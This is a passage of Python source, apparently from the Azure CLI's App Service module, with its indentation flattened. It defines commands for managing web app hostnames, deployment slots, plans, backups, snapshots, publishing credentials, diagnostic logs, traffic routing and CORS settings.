binding = HostNameBinding(site_name=webapp.name)
if slot is None:
return client.web_apps.create_or_update_host_name_binding(resource_group_name=resource_group_name,
name=webapp.name, host_name=hostname,
host_name_binding=binding)
return client.web_apps.create_or_update_host_name_binding_slot(resource_group_name=resource_group_name,
name=webapp.name, host_name=hostname,
slot=slot, host_name_binding=binding)
def delete_hostname(cmd, resource_group_name, webapp_name, hostname, slot=None):
client = web_client_factory(cmd.cli_ctx)
if slot is None:
return client.web_apps.delete_host_name_binding(resource_group_name, webapp_name, hostname)
return client.web_apps.delete_host_name_binding_slot(resource_group_name, webapp_name, slot, hostname)
def list_hostnames(cmd, resource_group_name, webapp_name, slot=None):
result = list(_generic_site_operation(cmd.cli_ctx, resource_group_name, webapp_name,
'list_host_name_bindings', slot))
for r in result:
r.name = r.name.split('/')[-1]
return result
def get_external_ip(cmd, resource_group_name, webapp_name):
SslState = cmd.get_models('SslState')
# logics here are ported from portal
client = web_client_factory(cmd.cli_ctx)
webapp = client.web_apps.get(resource_group_name, webapp_name)
if not webapp:
raise CLIError("'{}' app doesn't exist".format(webapp_name))
if webapp.hosting_environment_profile:
address = client.app_service_environments.list_vips(
resource_group_name, webapp.hosting_environment_profile.name)
if address.internal_ip_address:
ip_address = address.internal_ip_address
else:
vip = next((s for s in webapp.host_name_ssl_states if s.ssl_state == SslState.ip_based_enabled), None)
ip_address = vip.virtual_ip if vip else address.service_ip_address
else:
ip_address = _resolve_hostname_through_dns(webapp.default_host_name)
return {'ip': ip_address}
def _resolve_hostname_through_dns(hostname):
import socket
return socket.gethostbyname(hostname)
def create_webapp_slot(cmd, resource_group_name, webapp, slot, configuration_source=None):
Site, SiteConfig, NameValuePair = cmd.get_models('Site', 'SiteConfig', 'NameValuePair')
client = web_client_factory(cmd.cli_ctx)
site = client.web_apps.get(resource_group_name, webapp)
site_config = get_site_configs(cmd, resource_group_name, webapp, None)
if not site:
raise CLIError("'{}' app doesn't exist".format(webapp))
if 'functionapp' in site.kind:
raise CLIError("'{}' is a function app. Please use `az functionapp deployment slot create`.".format(webapp))
location = site.location
slot_def = Site(server_farm_id=site.server_farm_id, location=location)
slot_def.site_config = SiteConfig()
# if it is a Windows Container site, at least pass the necessary
# app settings to perform the container image validation:
if configuration_source and site_config.windows_fx_version:
# get settings from the source
clone_from_prod = configuration_source.lower() == webapp.lower()
src_slot = None if clone_from_prod else configuration_source
app_settings = _generic_site_operation(cmd.cli_ctx, resource_group_name, webapp,
'list_application_settings', src_slot)
settings = []
for k, v in app_settings.properties.items():
if k in ("DOCKER_REGISTRY_SERVER_USERNAME", "DOCKER_REGISTRY_SERVER_PASSWORD",
"DOCKER_REGISTRY_SERVER_URL"):
settings.append(NameValuePair(name=k, value=v))
slot_def.site_config = SiteConfig(app_settings=settings)
poller = client.web_apps.begin_create_or_update_slot(resource_group_name, webapp, site_envelope=slot_def, slot=slot)
result = LongRunningOperation(cmd.cli_ctx)(poller)
if configuration_source:
update_slot_configuration_from_source(cmd, client, resource_group_name, webapp, slot, configuration_source)
result.name = result.name.split('/')[-1]
return result
def create_functionapp_slot(cmd, resource_group_name, name, slot, configuration_source=None):
Site = cmd.get_models('Site')
client = web_client_factory(cmd.cli_ctx)
site = client.web_apps.get(resource_group_name, name)
if not site:
raise CLIError("'{}' function app doesn't exist".format(name))
location = site.location
slot_def = Site(server_farm_id=site.server_farm_id, location=location)
poller = client.web_apps.begin_create_or_update_slot(resource_group_name, name, site_envelope=slot_def, slot=slot)
result = LongRunningOperation(cmd.cli_ctx)(poller)
if configuration_source:
update_slot_configuration_from_source(cmd, client, resource_group_name, name, slot, configuration_source)
result.name = result.name.split('/')[-1]
return result
def update_slot_configuration_from_source(cmd, client, resource_group_name, webapp, slot, configuration_source=None):
clone_from_prod = configuration_source.lower() == webapp.lower()
site_config = get_site_configs(cmd, resource_group_name, webapp,
None if clone_from_prod else configuration_source)
_generic_site_operation(cmd.cli_ctx, resource_group_name, webapp,
'update_configuration', slot, site_config)
# slot create doesn't clone over the app-settings and connection-strings, so we do it here
# also make sure slot settings don't get propagated.
slot_cfg_names = client.web_apps.list_slot_configuration_names(resource_group_name, webapp)
src_slot = None if clone_from_prod else configuration_source
app_settings = _generic_site_operation(cmd.cli_ctx, resource_group_name, webapp,
'list_application_settings',
src_slot)
for a in slot_cfg_names.app_setting_names or []:
app_settings.properties.pop(a, None)
connection_strings = _generic_site_operation(cmd.cli_ctx, resource_group_name, webapp,
'list_connection_strings',
src_slot)
for a in slot_cfg_names.connection_string_names or []:
connection_strings.properties.pop(a, None)
_generic_settings_operation(cmd.cli_ctx, resource_group_name, webapp,
'update_application_settings',
app_settings, slot, client)
_generic_settings_operation(cmd.cli_ctx, resource_group_name, webapp,
'update_connection_strings',
connection_strings, slot, client)
def config_source_control(cmd, resource_group_name, name, repo_url, repository_type='git', branch=None, # pylint: disable=too-many-locals
manual_integration=None, git_token=None, slot=None, github_action=None):
client = web_client_factory(cmd.cli_ctx)
location = _get_location_from_webapp(client, resource_group_name, name)
from azure.mgmt.web.models import SiteSourceControl, SourceControl
if git_token:
sc = SourceControl(location=location, source_control_name='GitHub', token=git_token)
client.update_source_control('GitHub', sc)
source_control = SiteSourceControl(location=location, repo_url=repo_url, branch=branch,
is_manual_integration=manual_integration,
is_mercurial=(repository_type != 'git'), is_git_hub_action=bool(github_action))
# SCC config can fail if previous commands caused SCMSite shutdown, so retry here.
for i in range(5):
try:
poller = _generic_site_operation(cmd.cli_ctx, resource_group_name, name,
'begin_create_or_update_source_control',
slot, source_control)
return LongRunningOperation(cmd.cli_ctx)(poller)
except Exception as ex: # pylint: disable=broad-except
import re
ex = ex_handler_factory(no_throw=True)(ex)
# for non server errors(50x), just throw; otherwise retry 4 times
if i == 4 or not re.findall(r'\(50\d\)', str(ex)):
raise
logger.warning('retrying %s/4', i + 1)
time.sleep(5) # retry in a moment
def update_git_token(cmd, git_token=None):
'''
Update source control token cached in Azure app service. If no token is provided,
the command will clean up existing token.
'''
client = web_client_factory(cmd.cli_ctx)
from azure.mgmt.web.models import SourceControl
sc = SourceControl(name='not-really-needed', source_control_name='GitHub', token=git_token or '')
return client.update_source_control('GitHub', sc)
def show_source_control(cmd, resource_group_name, name, slot=None):
return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'get_source_control', slot)
def delete_source_control(cmd, resource_group_name, name, slot=None):
return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'delete_source_control', slot)
def enable_local_git(cmd, resource_group_name, name, slot=None):
client = web_client_factory(cmd.cli_ctx)
site_config = get_site_configs(cmd, resource_group_name, name, slot)
site_config.scm_type = 'LocalGit'
_generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'create_or_update_configuration', slot, site_config)
return {'url': _get_local_git_url(cmd.cli_ctx, client, resource_group_name, name, slot)}
def sync_site_repo(cmd, resource_group_name, name, slot=None):
try:
return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'sync_repository', slot)
except CloudError as ex: # Because of bad spec, sdk throws on 200. We capture it here
if ex.status_code not in [200, 204]:
raise ex
def list_app_service_plans(cmd, resource_group_name=None):
client = web_client_factory(cmd.cli_ctx)
if resource_group_name is None:
plans = list(client.app_service_plans.list(detailed=True)) # enables querying "numberOfSites"
else:
plans = list(client.app_service_plans.list_by_resource_group(resource_group_name))
for plan in plans:
# prune a few useless fields
del plan.geo_region
del plan.subscription
return plans
# TODO use zone_redundant field on ASP model when we switch to SDK version 5.0.0
def _enable_zone_redundant(plan_def, sku_def, number_of_workers):
plan_def.enable_additional_properties_sending()
existing_properties = plan_def.serialize()["properties"]
plan_def.additional_properties["properties"] = existing_properties
plan_def.additional_properties["properties"]["zoneRedundant"] = True
if number_of_workers is None:
sku_def.capacity = 3
else:
sku_def.capacity = max(3, number_of_workers)
def create_app_service_plan(cmd, resource_group_name, name, is_linux, hyper_v, per_site_scaling=False,
app_service_environment=None, sku='B1', number_of_workers=None, location=None,
tags=None, no_wait=False, zone_redundant=False):
HostingEnvironmentProfile, SkuDescription, AppServicePlan = cmd.get_models(
'HostingEnvironmentProfile', 'SkuDescription', 'AppServicePlan')
client = web_client_factory(cmd.cli_ctx)
if app_service_environment:
if hyper_v:
raise ArgumentUsageError('Windows containers is not yet supported in app service environment')
ase_list = client.app_service_environments.list()
ase_found = False
ase = None
for ase in ase_list:
if ase.name.lower() == app_service_environment.lower() or ase.id.lower() == app_service_environment.lower():
ase_def = HostingEnvironmentProfile(id=ase.id)
location = ase.location
ase_found = True
break
if not ase_found:
err_msg = "App service environment '{}' not found in subscription.".format(app_service_environment)
raise ResourceNotFoundError(err_msg)
else: # Non-ASE
ase_def = None
if location is None:
location = _get_location_from_resource_group(cmd.cli_ctx, resource_group_name)
# the api is odd on parameter naming, have to live with it for now
sku_def = SkuDescription(tier=get_sku_tier(sku), name=_normalize_sku(sku), capacity=number_of_workers)
plan_def = AppServicePlan(location=location, tags=tags, sku=sku_def,
reserved=(is_linux or None), hyper_v=(hyper_v or None), name=name,
per_site_scaling=per_site_scaling, hosting_environment_profile=ase_def)
if sku.upper() in ['WS1', 'WS2', 'WS3']:
existing_plan = get_resource_if_exists(client.app_service_plans,
resource_group_name=resource_group_name, name=name)
if existing_plan and existing_plan.sku.tier != "WorkflowStandard":
raise ValidationError("Plan {} in resource group {} already exists and "
"cannot be updated to a logic app SKU (WS1, WS2, or WS3)")
plan_def.type = "elastic"
if zone_redundant:
_enable_zone_redundant(plan_def, sku_def, number_of_workers)
return sdk_no_wait(no_wait, client.app_service_plans.begin_create_or_update, name=name,
resource_group_name=resource_group_name, app_service_plan=plan_def)
def update_app_service_plan(instance, sku=None, number_of_workers=None, elastic_scale=None,
max_elastic_worker_count=None):
if number_of_workers is None and sku is None and elastic_scale is None and max_elastic_worker_count is None:
args = ["--number-of-workers", "--sku", "--elastic-scale", "--max-elastic-worker-count"]
logger.warning('Nothing to update. Set one of the following parameters to make an update: %s', str(args))
sku_def = instance.sku
if sku is not None:
sku = _normalize_sku(sku)
sku_def.tier = get_sku_tier(sku)
sku_def.name = sku
if number_of_workers is not None:
sku_def.capacity = number_of_workers
else:
number_of_workers = sku_def.capacity
if elastic_scale is not None or max_elastic_worker_count is not None:
if sku is None:
sku = instance.sku.name
if get_sku_tier(sku) not in ["PREMIUMV2", "PREMIUMV3"]:
raise ValidationError("--number-of-workers and --elastic-scale can only be used on premium V2/V3 SKUs. "
"Use command help to see all available SKUs")
if elastic_scale is not None:
# TODO use instance.elastic_scale_enabled once the ASP client factories are updated
use_additional_properties(instance)
instance.additional_properties["properties"]["elasticScaleEnabled"] = elastic_scale
if max_elastic_worker_count is not None:
instance.maximum_elastic_worker_count = max_elastic_worker_count
if max_elastic_worker_count < number_of_workers:
raise InvalidArgumentValueError("--max-elastic-worker-count must be greater than or equal to the "
"plan's number of workers. To update the plan's number of workers, use "
"--number-of-workers ")
# TODO use instance.maximum_elastic_worker_count once the ASP client factories are updated
use_additional_properties(instance)
instance.additional_properties["properties"]["maximumElasticWorkerCount"] = max_elastic_worker_count
instance.sku = sku_def
return instance
def show_plan(cmd, resource_group_name, name):
from azure.cli.core.commands.client_factory import get_subscription_id
client = web_client_factory(cmd.cli_ctx)
serverfarm_url_base = 'subscriptions/{}/resourceGroups/{}/providers/Microsoft.Web/serverfarms/{}?api-version={}'
subscription_id = get_subscription_id(cmd.cli_ctx)
serverfarm_url = serverfarm_url_base.format(subscription_id, resource_group_name, name, client.DEFAULT_API_VERSION)
request_url = cmd.cli_ctx.cloud.endpoints.resource_manager + serverfarm_url
response = send_raw_request(cmd.cli_ctx, "GET", request_url)
return response.json()
def update_functionapp_app_service_plan(cmd, instance, sku=None, number_of_workers=None, max_burst=None):
instance = update_app_service_plan(instance, sku, number_of_workers)
if max_burst is not None:
if not is_plan_elastic_premium(cmd, instance):
raise CLIError("Usage error: --max-burst is only supported for Elastic Premium (EP) plans")
max_burst = validate_range_of_int_flag('--max-burst', max_burst, min_val=0, max_val=20)
instance.maximum_elastic_worker_count = max_burst
if number_of_workers is not None:
number_of_workers = validate_range_of_int_flag('--number-of-workers / --min-instances',
number_of_workers, min_val=0, max_val=20)
return update_app_service_plan(instance, sku, number_of_workers)
def show_backup_configuration(cmd, resource_group_name, webapp_name, slot=None):
try:
return _generic_site_operation(cmd.cli_ctx, resource_group_name, webapp_name,
'get_backup_configuration', slot)
except Exception: # pylint: disable=broad-except
raise CLIError('Backup configuration not found')
def list_backups(cmd, resource_group_name, webapp_name, slot=None):
return _generic_site_operation(cmd.cli_ctx, resource_group_name, webapp_name, 'list_backups', slot)
def create_backup(cmd, resource_group_name, webapp_name, storage_account_url,
db_name=None, db_type=None,
db_connection_string=None, backup_name=None, slot=None):
BackupRequest = cmd.get_models('BackupRequest')
client = web_client_factory(cmd.cli_ctx)
if backup_name and backup_name.lower().endswith('.zip'):
backup_name = backup_name[:-4]
db_setting = _create_db_setting(cmd, db_name, db_type=db_type, db_connection_string=db_connection_string)
backup_request = BackupRequest(backup_name=backup_name,
storage_account_url=storage_account_url, databases=db_setting)
if slot:
return client.web_apps.backup_slot(resource_group_name, webapp_name, backup_request, slot)
return client.web_apps.backup(resource_group_name, webapp_name, backup_request)
def update_backup_schedule(cmd, resource_group_name, webapp_name, storage_account_url=None,
frequency=None, keep_at_least_one_backup=None,
retention_period_in_days=None, db_name=None,
db_connection_string=None, db_type=None, backup_name=None, slot=None):
BackupSchedule, BackupRequest = cmd.get_models('BackupSchedule', 'BackupRequest')
configuration = None
if backup_name and backup_name.lower().endswith('.zip'):
backup_name = backup_name[:-4]
if not backup_name:
backup_name = '{0}_{1}'.format(webapp_name, datetime.datetime.utcnow().strftime('%Y%m%d%H%M'))
try:
configuration = _generic_site_operation(cmd.cli_ctx, resource_group_name, webapp_name,
'get_backup_configuration', slot)
except Exception: # pylint: disable=broad-except
# No configuration set yet
if not all([storage_account_url, frequency, retention_period_in_days,
keep_at_least_one_backup]):
raise CLIError('No backup configuration found. A configuration must be created. ' +
'Usage: --container-url URL --frequency TIME --retention DAYS ' +
'--retain-one TRUE/FALSE')
# If arguments were not specified, use the values in the current backup schedule
if storage_account_url is None:
storage_account_url = configuration.storage_account_url
if retention_period_in_days is None:
retention_period_in_days = configuration.backup_schedule.retention_period_in_days
if keep_at_least_one_backup is None:
keep_at_least_one_backup = configuration.backup_schedule.keep_at_least_one_backup
else:
keep_at_least_one_backup = keep_at_least_one_backup.lower() == 'true'
if frequency:
# Parse schedule frequency
frequency_num, frequency_unit = _parse_frequency(cmd, frequency)
else:
frequency_num = configuration.backup_schedule.frequency_interval
frequency_unit = configuration.backup_schedule.frequency_unit
if configuration and configuration.databases:
db = configuration.databases[0]
db_type = db_type or db.database_type
db_name = db_name or db.name
db_connection_string = db_connection_string or db.connection_string
db_setting = _create_db_setting(cmd, db_name, db_type=db_type, db_connection_string=db_connection_string)
backup_schedule = BackupSchedule(frequency_interval=frequency_num, frequency_unit=frequency_unit.name,
keep_at_least_one_backup=keep_at_least_one_backup,
retention_period_in_days=retention_period_in_days)
backup_request = BackupRequest(backup_request_name=backup_name, backup_schedule=backup_schedule,
enabled=True, storage_account_url=storage_account_url,
databases=db_setting)
return _generic_site_operation(cmd.cli_ctx, resource_group_name, webapp_name, 'update_backup_configuration',
slot, backup_request)
def restore_backup(cmd, resource_group_name, webapp_name, storage_account_url, backup_name,
db_name=None, db_type=None, db_connection_string=None,
target_name=None, overwrite=None, ignore_hostname_conflict=None, slot=None):
RestoreRequest = cmd.get_models('RestoreRequest')
client = web_client_factory(cmd.cli_ctx)
storage_blob_name = backup_name
if not storage_blob_name.lower().endswith('.zip'):
storage_blob_name += '.zip'
db_setting = _create_db_setting(cmd, db_name, db_type=db_type, db_connection_string=db_connection_string)
restore_request = RestoreRequest(storage_account_url=storage_account_url,
blob_name=storage_blob_name, overwrite=overwrite,
site_name=target_name, databases=db_setting,
ignore_conflicting_host_names=ignore_hostname_conflict)
if slot:
return client.web_apps.restore_slot(resource_group_name, webapp_name, 0, restore_request, slot)
return client.web_apps.restore(resource_group_name, webapp_name, 0, restore_request)
def list_snapshots(cmd, resource_group_name, name, slot=None):
return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'list_snapshots',
slot)
def restore_snapshot(cmd, resource_group_name, name, time, slot=None, restore_content_only=False, # pylint: disable=redefined-outer-name
source_resource_group=None, source_name=None, source_slot=None):
from azure.cli.core.commands.client_factory import get_subscription_id
SnapshotRecoverySource, SnapshotRestoreRequest = cmd.get_models('SnapshotRecoverySource', 'SnapshotRestoreRequest')
client = web_client_factory(cmd.cli_ctx)
recover_config = not restore_content_only
if all([source_resource_group, source_name]):
# Restore from source app to target app
sub_id = get_subscription_id(cmd.cli_ctx)
source_id = "/subscriptions/" + sub_id + "/resourceGroups/" + source_resource_group + \
"/providers/Microsoft.Web/sites/" + source_name
if source_slot:
source_id = source_id + "/slots/" + source_slot
source = SnapshotRecoverySource(id=source_id)
request = SnapshotRestoreRequest(overwrite=False, snapshot_time=time, recovery_source=source,
recover_configuration=recover_config)
if slot:
return client.web_apps.restore_snapshot_slot(resource_group_name, name, request, slot)
return client.web_apps.restore_snapshot(resource_group_name, name, request)
if any([source_resource_group, source_name]):
raise CLIError('usage error: --source-resource-group and --source-name must both be specified if one is used')
# Overwrite app with its own snapshot
request = SnapshotRestoreRequest(overwrite=True, snapshot_time=time, recover_configuration=recover_config)
if slot:
return client.web_apps.restore_snapshot_slot(resource_group_name, name, request, slot)
return client.web_apps.restore_snapshot(resource_group_name, name, request)
# pylint: disable=inconsistent-return-statements
def _create_db_setting(cmd, db_name, db_type, db_connection_string):
DatabaseBackupSetting = cmd.get_models('DatabaseBackupSetting')
if all([db_name, db_type, db_connection_string]):
return [DatabaseBackupSetting(database_type=db_type, name=db_name, connection_string=db_connection_string)]
if any([db_name, db_type, db_connection_string]):
raise CLIError('usage error: --db-name NAME --db-type TYPE --db-connection-string STRING')
def _parse_frequency(cmd, frequency):
FrequencyUnit = cmd.get_models('FrequencyUnit')
unit_part = frequency.lower()[-1]
if unit_part == 'd':
frequency_unit = FrequencyUnit.day
elif unit_part == 'h':
frequency_unit = FrequencyUnit.hour
else:
raise CLIError('Frequency must end with d or h for "day" or "hour"')
try:
frequency_num = int(frequency[:-1])
except ValueError:
raise CLIError('Frequency must start with a number')
if frequency_num < 0:
raise CLIError('Frequency must be positive')
return frequency_num, frequency_unit
def _get_deleted_apps_locations(cli_ctx):
client = get_mgmt_service_client(cli_ctx, ResourceType.MGMT_RESOURCE_RESOURCES)
web_provider = client.providers.get('Microsoft.Web')
del_sites_resource = next((x for x in web_provider.resource_types if x.resource_type == 'deletedSites'), None)
if del_sites_resource:
return del_sites_resource.locations
return []
def _get_local_git_url(cli_ctx, client, resource_group_name, name, slot=None):
user = client.get_publishing_user()
result = _generic_site_operation(cli_ctx, resource_group_name, name, 'get_source_control', slot)
parsed = urlparse(result.repo_url)
return '{}://{}@{}/{}.git'.format(parsed.scheme, user.publishing_user_name,
parsed.netloc, name)
def _get_scm_url(cmd, resource_group_name, name, slot=None):
from azure.mgmt.web.models import HostType
app = _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'get', slot)
for host in app.host_name_ssl_states or []:
if host.host_type == HostType.repository:
return "https://{}".format(host.name)
# this should not happen, but throw anyway
raise ValueError('Failed to retrieve Scm Uri')
def get_publishing_user(cmd):
client = web_client_factory(cmd.cli_ctx)
return client.get_publishing_user()
def set_deployment_user(cmd, user_name, password=None):
'''
Update deployment credentials.(Note, all webapps in your subscription will be impacted)
'''
User = cmd.get_models('User')
client = web_client_factory(cmd.cli_ctx)
user = User(publishing_user_name=user_name)
if password is None:
try:
password = prompt_pass(msg='Password: ', confirm=True)
except NoTTYException:
raise CLIError('Please specify both username and password in non-interactive mode.')
user.publishing_password = password
return client.update_publishing_user(user)
def list_publishing_credentials(cmd, resource_group_name, name, slot=None):
content = _generic_site_operation(cmd.cli_ctx, resource_group_name, name,
'begin_list_publishing_credentials', slot)
return content.result()
def list_publish_profiles(cmd, resource_group_name, name, slot=None, xml=False):
import xmltodict
content = _generic_site_operation(cmd.cli_ctx, resource_group_name, name,
'list_publishing_profile_xml_with_secrets', slot, {"format": "WebDeploy"})
full_xml = ''
for f in content:
full_xml += f.decode()
if not xml:
profiles = xmltodict.parse(full_xml, xml_attribs=True)['publishData']['publishProfile']
converted = []
if not isinstance(profiles, list):
profiles = [profiles]
for profile in profiles:
new = {}
for key in profile:
# strip the leading '@' xmltodict put in for attributes
new[key.lstrip('@')] = profile[key]
converted.append(new)
return converted
cmd.cli_ctx.invocation.data['output'] = 'tsv'
return full_xml
def enable_cd(cmd, resource_group_name, name, enable, slot=None):
settings = []
settings.append("DOCKER_ENABLE_CI=" + enable)
update_app_settings(cmd, resource_group_name, name, settings, slot)
return show_container_cd_url(cmd, resource_group_name, name, slot)
def show_container_cd_url(cmd, resource_group_name, name, slot=None):
settings = get_app_settings(cmd, resource_group_name, name, slot)
docker_enabled = False
for setting in settings:
if setting['name'] == 'DOCKER_ENABLE_CI' and setting['value'] == 'true':
docker_enabled = True
break
cd_settings = {}
cd_settings['DOCKER_ENABLE_CI'] = docker_enabled
if docker_enabled:
credentials = list_publishing_credentials(cmd, resource_group_name, name, slot)
if credentials:
cd_url = credentials.scm_uri + '/docker/hook'
cd_settings['CI_CD_URL'] = cd_url
else:
cd_settings['CI_CD_URL'] = ''
return cd_settings
def view_in_browser(cmd, resource_group_name, name, slot=None, logs=False):
url = _get_url(cmd, resource_group_name, name, slot)
open_page_in_browser(url)
if logs:
get_streaming_log(cmd, resource_group_name, name, provider=None, slot=slot)
def _get_url(cmd, resource_group_name, name, slot=None):
SslState = cmd.get_models('SslState')
site = _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'get', slot)
if not site:
raise CLIError("'{}' app doesn't exist".format(name))
url = site.enabled_host_names[0] # picks the custom domain URL incase a domain is assigned
ssl_host = next((h for h in site.host_name_ssl_states
if h.ssl_state != SslState.disabled), None)
return ('https' if ssl_host else 'http') + '://' + url
# TODO: expose new blob suport
def config_diagnostics(cmd, resource_group_name, name, level=None,
application_logging=None, web_server_logging=None,
docker_container_logging=None, detailed_error_messages=None,
failed_request_tracing=None, slot=None):
from azure.mgmt.web.models import (FileSystemApplicationLogsConfig, ApplicationLogsConfig,
AzureBlobStorageApplicationLogsConfig, SiteLogsConfig,
HttpLogsConfig, FileSystemHttpLogsConfig,
EnabledConfig)
client = web_client_factory(cmd.cli_ctx)
# TODO: ensure we call get_site only once
site = client.web_apps.get(resource_group_name, name)
if not site:
raise CLIError("'{}' app doesn't exist".format(name))
location = site.location
application_logs = None
if application_logging:
fs_log = None
blob_log = None
level = level if application_logging != 'off' else False
level = True if level is None else level
if application_logging in ['filesystem', 'off']:
fs_log = FileSystemApplicationLogsConfig(level=level)
if application_logging in ['azureblobstorage', 'off']:
blob_log = AzureBlobStorageApplicationLogsConfig(level=level, retention_in_days=3,
sas_url=None)
application_logs = ApplicationLogsConfig(file_system=fs_log,
azure_blob_storage=blob_log)
http_logs = None
server_logging_option = web_server_logging or docker_container_logging
if server_logging_option:
# TODO: az blob storage log config currently not in use, will be impelemented later.
# Tracked as Issue: #4764 on Github
filesystem_log_config = None
turned_on = server_logging_option != 'off'
if server_logging_option in ['filesystem', 'off']:
# 100 mb max log size, retention lasts 3 days. Yes we hard code it, portal does too
filesystem_log_config = FileSystemHttpLogsConfig(retention_in_mb=100, retention_in_days=3,
enabled=turned_on)
http_logs = HttpLogsConfig(file_system=filesystem_log_config, azure_blob_storage=None)
detailed_error_messages_logs = (None if detailed_error_messages is None
else EnabledConfig(enabled=detailed_error_messages))
failed_request_tracing_logs = (None if failed_request_tracing is None
else EnabledConfig(enabled=failed_request_tracing))
site_log_config = SiteLogsConfig(location=location,
application_logs=application_logs,
http_logs=http_logs,
failed_requests_tracing=failed_request_tracing_logs,
detailed_error_messages=detailed_error_messages_logs)
return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'update_diagnostic_logs_config',
slot, site_log_config)
def show_diagnostic_settings(cmd, resource_group_name, name, slot=None):
return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'get_diagnostic_logs_configuration', slot)
def show_deployment_log(cmd, resource_group, name, slot=None, deployment_id=None):
import urllib3
import requests
scm_url = _get_scm_url(cmd, resource_group, name, slot)
username, password = _get_site_credential(cmd.cli_ctx, resource_group, name, slot)
headers = urllib3.util.make_headers(basic_auth='{}:{}'.format(username, password))
deployment_log_url = ''
if deployment_id:
deployment_log_url = '{}/api/deployments/{}/log'.format(scm_url, deployment_id)
else:
deployments_url = '{}/api/deployments/'.format(scm_url)
response = requests.get(deployments_url, headers=headers)
if response.status_code != 200:
raise CLIError("Failed to connect to '{}' with status code '{}' and reason '{}'".format(
deployments_url, response.status_code, response.reason))
sorted_logs = sorted(
response.json(),
key=lambda x: x['start_time'],
reverse=True
)
if sorted_logs and sorted_logs[0]:
deployment_log_url = sorted_logs[0].get('log_url', '')
if deployment_log_url:
response = requests.get(deployment_log_url, headers=headers)
if response.status_code != 200:
raise CLIError("Failed to connect to '{}' with status code '{}' and reason '{}'".format(
deployment_log_url, response.status_code, response.reason))
return response.json()
return []
def list_deployment_logs(cmd, resource_group, name, slot=None):
scm_url = _get_scm_url(cmd, resource_group, name, slot)
deployment_log_url = '{}/api/deployments/'.format(scm_url)
username, password = _get_site_credential(cmd.cli_ctx, resource_group, name, slot)
import urllib3
headers = urllib3.util.make_headers(basic_auth='{}:{}'.format(username, password))
import requests
response = requests.get(deployment_log_url, headers=headers)
if response.status_code != 200:
raise CLIError("Failed to connect to '{}' with status code '{}' and reason '{}'".format(
scm_url, response.status_code, response.reason))
return response.json() or []
def config_slot_auto_swap(cmd, resource_group_name, webapp, slot, auto_swap_slot=None, disable=None):
client = web_client_factory(cmd.cli_ctx)
site_config = client.web_apps.get_configuration_slot(resource_group_name, webapp, slot)
site_config.auto_swap_slot_name = '' if disable else (auto_swap_slot or 'production')
return _generic_site_operation(cmd.cli_ctx, resource_group_name, webapp, 'update_configuration', slot, site_config)
def list_slots(cmd, resource_group_name, webapp):
client = web_client_factory(cmd.cli_ctx)
slots = list(client.web_apps.list_slots(resource_group_name, webapp))
for slot in slots:
slot.name = slot.name.split('/')[-1]
setattr(slot, 'app_service_plan', parse_resource_id(slot.server_farm_id)['name'])
del slot.server_farm_id
return slots
def swap_slot(cmd, resource_group_name, webapp, slot, target_slot=None, preserve_vnet=None, action='swap'):
client = web_client_factory(cmd.cli_ctx)
# Default isPreserveVnet to 'True' if preserve_vnet is 'None'
isPreserveVnet = preserve_vnet if preserve_vnet is not None else 'true'
# converstion from string to Boolean
isPreserveVnet = bool(isPreserveVnet == 'true')
CsmSlotEntity = cmd.get_models('CsmSlotEntity')
slot_swap_entity = CsmSlotEntity(target_slot=target_slot or 'production', preserve_vnet=isPreserveVnet)
if action == 'swap':
poller = client.web_apps.begin_swap_slot(resource_group_name, webapp, slot, slot_swap_entity)
return poller
if action == 'preview':
if slot is None:
result = client.web_apps.apply_slot_config_to_production(resource_group_name, webapp, slot_swap_entity)
else:
result = client.web_apps.apply_slot_configuration_slot(resource_group_name, webapp, slot, slot_swap_entity)
return result
# we will reset both source slot and target slot
if target_slot is None:
client.web_apps.reset_production_slot_config(resource_group_name, webapp)
else:
client.web_apps.reset_slot_configuration_slot(resource_group_name, webapp, target_slot)
return None
def delete_slot(cmd, resource_group_name, webapp, slot):
client = web_client_factory(cmd.cli_ctx)
# TODO: once swagger finalized, expose other parameters like: delete_all_slots, etc...
client.web_apps.delete_slot(resource_group_name, webapp, slot)
def set_traffic_routing(cmd, resource_group_name, name, distribution):
RampUpRule = cmd.get_models('RampUpRule')
client = web_client_factory(cmd.cli_ctx)
site = client.web_apps.get(resource_group_name, name)
if not site:
raise CLIError("'{}' app doesn't exist".format(name))
configs = get_site_configs(cmd, resource_group_name, name)
host_name_split = site.default_host_name.split('.', 1)
host_name_suffix = '.' + host_name_split[1]
host_name_val = host_name_split[0]
configs.experiments.ramp_up_rules = []
for r in distribution:
slot, percentage = r.split('=')
action_host_name_slot = host_name_val + "-" + slot
configs.experiments.ramp_up_rules.append(RampUpRule(action_host_name=action_host_name_slot + host_name_suffix,
reroute_percentage=float(percentage),
name=slot))
_generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'update_configuration', None, configs)
return configs.experiments.ramp_up_rules
def show_traffic_routing(cmd, resource_group_name, name):
configs = get_site_configs(cmd, resource_group_name, name)
return configs.experiments.ramp_up_rules
def clear_traffic_routing(cmd, resource_group_name, name):
set_traffic_routing(cmd, resource_group_name, name, [])
def add_cors(cmd, resource_group_name, name, allowed_origins, slot=None):
from azure.mgmt.web.models import CorsSettings
configs = get_site_configs(cmd, resource_group_name, name, slot)
if not configs.cors:
configs.cors = CorsSettings()
configs.cors.allowed_origins = (configs.cors.allowed_origins or []) + allowed_origins
result = _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'update_configuration', slot, configs)
return result.cors
def remove_cors(cmd, resource_group_name, name, allowed_origins, slot=None):
configs = get_site_configs(cmd, resource_group_name, name, slot)
if configs.cors:
if allowed_origins:
configs.cors.allowed_origins = [x for x in (configs.cors.allowed_origins or []) if x not in allowed_origins]
else:
configs.cors.allowed_origins = []
configs = _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'update_configuration', slot, configs)
return configs.cors
def show_cors(cmd, resource_group_name, name, slot=None):
configs = get_site_configs(cmd, resource_group_name, name, slot)
return configs.cors
def get_streaming_log(cmd, resource_group_name, name, provider=None, slot=None):
scm_url = _get_scm_url(cmd, resource_group_name, name, slot)
streaming_url = scm_url + '/logstream'
if provider:
streaming_url += ('/' + provider.lstrip('/'))
